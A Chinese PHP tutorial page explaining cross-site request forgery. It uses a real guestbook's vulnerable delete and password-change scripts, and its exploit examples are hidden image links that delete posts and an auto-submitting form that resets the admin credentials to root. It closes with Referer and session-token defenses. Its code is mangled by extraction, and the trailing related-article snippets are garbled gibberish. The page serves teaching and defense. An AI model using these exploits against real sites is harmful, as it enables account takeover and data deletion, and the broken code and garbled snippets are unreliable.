PHP漏洞全解(六)-跨網站請求偽造-php教程-PHP中文網

首頁

後端開發

php教程

PHP漏洞全解(六)-跨網站請求偽造

黄舟

Dec 22, 2016 am 09:27 AM

CSRF(Cross Site Request Forgeries)，意為跨網站請求偽造，也有寫為XSRF。攻擊者偽造目標使用者的HTTP請求，然後此請求傳送到有CSRF漏洞的網站，網站執行此請求後，引發跨站請求偽造攻擊。攻擊者利用隱蔽的HTTP連接，讓目標用戶在不注意的情況下單擊這個鏈接，由於是用戶自己點擊的，而他又是合法用戶擁有合法權限，所以目標用戶能夠在網站內執行特定的HTTP鏈接，從而達到攻擊者的目的。
例如:某個購物網站購買商品時，採用http://www.shop.com/buy.php?item=watch&num=1，item參數決定要購買什麼物品，num參數決定要購買數量，如果攻擊者以隱藏的方式發送給目標用戶鏈接，那麼如果目標用戶不小心訪問以後，購買的數量就成了1000個
實例
隨緣網絡PHP留言板V1.0
任意刪除留言
//delbook.php 此頁面用於刪除留言
include_once(“dlyz.php”); //dlyz.php使用者驗證權限，當權限是admin的時候方可刪除留言
include_once(“../conn.php”);
$del= $_GET[“del”];
$id=$_GET[“id”];
if ($del==”data”)
{
$ID_Dele= implode(“,”,$_POST['adid'] );
$sql=”delete from book where id in (“.$ID_Dele.”)”;
mysql_query($sql);
}
else
{
$sql=”delete from book where id=”.$ id; //傳遞要刪除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo “”;
echo “alert('刪除成功！');”;
echo ” location= 'book.php';”;
echo “”;
?>
當我們有admin權限，提交http://localhost/manage/delbook.php?id=2 時，就會刪除id為2的留言
利用方法: 我們使用一般使用者留言（原始碼方式），內容為 「delbook.php?id=2」 /> 「delbook.php?id=3」/> 「delbook.php? id=4” /> 「delbook.php?id=5」 /> 插入4張圖片連結分別刪除4個id留言，然後我們回到首頁瀏覽看，沒有什麼變化。。圖片顯示不了 現在我們再用管理員帳號登陸後，來刷新首頁，會發現留言就剩一條，其他在圖片連結中指定的ID號的留言，全部都被刪除。 攻擊者在留言中插入隱藏的圖片鏈接，此鏈接具有刪除留言的作用，而攻擊者自己訪問這些圖片鏈接的時候，是不具有權限的，所以看不到任何效果，但是當管理員登陸後，查看此留言，就會執行隱藏的鏈接，而他的權限又是足夠大的，從而這些留言就被刪除了 修改管理員密碼 //pass.php if($_GET[“act”] ) { $username=$_POST[“username”]; $sh=$_POST[“sh”]; $gg=$_POST[“gg”]; $title=$_POST[“title”] ; $copyright=$_POST[“copyright”].” 設計製作：黑客契約安全網”; $password=md5($_POST[“password”]); if(emptyempty($_POST[“password” ])) { $sql=”update gly set username='”.$username.”',sh=”.$sh.”,gg='”.$gg.”',title='”.$ title.”',copyright='”.$copyright.”' where id=1″; } else { $sql=”update gly set username='”.$username.”',password='” .$password.”',sh=”.$sh.”,gg='”.$gg.”',title='”.$title.”',copyright='”.$copyright.”' where id =1″; } mysql_query($sql); mysql_close($conn); echo “”; echo “alert('修改成功！');”; echo ” location='pass.php'; ”; echo “”; } 這個文件用於修改管理密碼和網站設置的一些信息，我們可以直接構造如下表單: <form action="%E2%80%9Dhttp://localhost/manage/pass" .php method="”post”" name="”form1″" id="”form1″"> <input type="”radio”" value="”1″" name="”sh”"> <input type="”radio”" name="”sh”" checked value="”0″"> <input type="”text”" name="”username”" value="”root”"> <input type="”password”" name="”password”" value="”root”"> <input type="”text”" name="”title”" value="”隨緣網絡PHP留言板V1.0(帶審核功能)”"> <textarea name="”gg”" rows="”6″" cols="”80″">歡迎您安裝使用隨緣網路PHP留言板V1.0(附審核功能)！ textarea> <textarea name="”copyright”" rows="”6″" cols="”80″">隨緣網絡PHP留言本V1.0 版權所有：廈門隨緣網絡科技2005-2009 承接網站建設及系統定制提供優惠主機域名textarea> form> body> 存為attack.html，放到自己網站上http://www.sectop.com/attack.html，此頁面造訪後會自動向目標程式的pass.php提交參數，使用者名稱修改為root，密碼修改為root，然後我們去留言板發一條留言，隱藏這個鏈接，管理訪問以後，他的用戶名和密碼全部修改成了root 防範方法 防範CSRF要比防範其他攻擊更加困難，因為CSRF的HTTP請求雖然是攻擊者偽造的，但是卻是由目標用戶發出的，一般常見的防範方法有下面幾種: 1、檢查網頁的來源 2、檢查內置的隱藏變量 3 、使用POST，不要使用GET 檢查網頁來源 在//pass.php頭部加入以下紅色字體代碼，驗證資料提交 if($_GET[“act”]) { if(isset($_SERVER[ “HTTP_REFERER”])) { $serverhost = $_SERVER[“SERVER_NAME”]; $strurl = str_replace(“http://”,”,$_SERVER[“HTTP_REFERER”]); $strdomain = explodede (“/”,$strurl); $sourcehost = $strdomain[0]; if(strncmp($sourcehost, $serverhost, strlen($serverhost))) { unset($_POST); echo “” ; echo “alert('資料來源異常!');”; echo ” location='index.php';”; echo “”; } } $username=$_POST[“username”]; $sh=$_POST[“sh”]; $gg=$_POST[“gg”]; $title=$_POST[“title”]; $copyright=$_POST[“copyright”].” 設計製作：廈門隨緣網路科技”; $password=md5($_POST[“password”]); if(emptyempty($_POST[“password”])) { $sql=”update gly set username= '”.$username.”',sh=”.$sh.”,gg='”.$gg.”',title='”.$title.”',copyright='”.$copyright.”' where id=1″; } else { $sql=”update gly set username='”.$username.”',password='”.$password.”',sh=”.$sh.” ,gg='”.$gg.”',title='”.$title.”',copyright='”.$copyright.”' where id=1″; } mysql_query($sql); mysql_close ($conn); echo “”; echo “alert('修改成功！ ');”; echo ” location='pass.php';”; echo “”; } 檢查內置隱藏變量 我們在表單中內置一個隱藏變量和一個session變量，然後檢查這個隱藏變量和session變數是否相等，以此判斷是否為同一個網頁所呼叫 php include_once("dlyz.php");include_once("../conn.php");if($_GET["act"]){ if (!isset($_SESSION["post_id"])){// 產生唯一的ID，並使用MD5來加密$post_id = md5(uniqid(rand(), true));// 建立Session變數$_SESSION[ "post_id"] = $post_id;}// 檢查是否相等if (isset($_SESSION["post_id"])){// 不相等if ($_SESSION["post_id"] != $_POST["post_id"] ){// 清除POST變數unset($_POST);echo "<script language="javascript">";echo "alert('資料來源異常!');";echo " location='index.php';" ;echo "script>";}}…<input type="reset" name="Submit2" value="重置"><input type="hidden" name="post_id" value="php echo $_SESSION[ "post_id"];?>">td>tr>table>form>php}mysql_close($conn);?> </script></textarea></textarea> </form>

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

如何使PHP應用程序更快May 12, 2025 am 12:12 AM

tomakephpapplicationsfaster，關注台詞：1）useopcodeCachingLikeLikeLikeLikeLikePachetoStorePreciledScompiledScriptbyTecode.2）MinimimiedAtabaseSqueriSegrieSqueriSegeriSybysequeryCachingandeffeftExting.3）Leveragephp7 leveragephp7 leveragephp7 leveragephpphp7功能forbettercodeefficy.4）

PHP性能優化清單：立即提高速度May 12, 2025 am 12:07 AM

到ImprovephPapplicationspeed，關注台詞：1）啟用opcodeCachingwithapCutoredUcescriptexecutiontime.2）實現databasequerycachingingusingpdotominiminimizedatabasehits.3）usehttp/2tomultiplexrequlexrequestsandreduceconnection.4 limitesclection.4.4

PHP依賴注入：提高代碼可檢驗性May 12, 2025 am 12:03 AM

依赖注入（DI）通过显式传递依赖关系，显著提升了PHP代码的可测试性。1）DI解耦类与具体实现，使测试和维护更灵活。2）三种类型中，构造函数注入明确表达依赖，保持状态一致。3）使用DI容器管理复杂依赖，提升代码质量和开发效率。

PHP性能優化：數據庫查詢優化May 12, 2025 am 12:02 AM

DatabasequeryoptimizationinPHPinvolvesseveralstrategiestoenhanceperformance.1)Selectonlynecessarycolumnstoreducedatatransfer.2)Useindexingtospeedupdataretrieval.3)Implementquerycachingtostoreresultsoffrequentqueries.4)Utilizepreparedstatementsforeffi

簡單指南：帶有PHP腳本的電子郵件發送May 12, 2025 am 12:02 AM

phpisusedforsenderemailsduetoitsbuilt-inmail（）函數andsupportivelibrariesLikePhpMailerAndSwiftMailer.1）usethemail（）functionForbasiceMails，butithasimails.2）butithasimail.2）

PHP性能：識別和修復瓶頸May 11, 2025 am 12:13 AM

PHP性能瓶颈可以通过以下步骤解决：1)使用Xdebug或Blackfire进行性能分析，找出问题所在；2)优化数据库查询并使用缓存，如APCu；3)使用array_filter等高效函数优化数组操作；4)配置OPcache进行字节码缓存；5)优化前端，如减少HTTP请求和优化图片；6)持续监控和优化性能。通过这些方法，可以显著提升PHP应用的性能。

PHP的依賴注入：快速摘要May 11, 2025 am 12:09 AM

依賴性注射（DI）InphpisadesignPatternthatManages和ReducesClassDeptions，增強量強制性，可驗證性和MATIALWINABIOS.ItallowSpasspassingDepentenciesLikEdenciesLikedAbaseConnectionStoclasseconnectionStoclasseSasasasasareTers，interitationAseTestingEaseTestingEaseTestingEaseTestingEasingAndScalability。

提高PHP性能：緩存策略和技術May 11, 2025 am 12:08 AM

cachingimprovesphpermenceByStorcyResultSofComputationsorqucrouctationsorquctationsorquickretrieval，reducingServerLoadAndenHancingResponsetimes.feftectivestrategiesinclude：1）opcodecaching，whereStoresCompiledSinmememorytssinmemorytoskipcompliation; 2）datacaching datacachingsingMemccachingmcachingmcachings

See all articles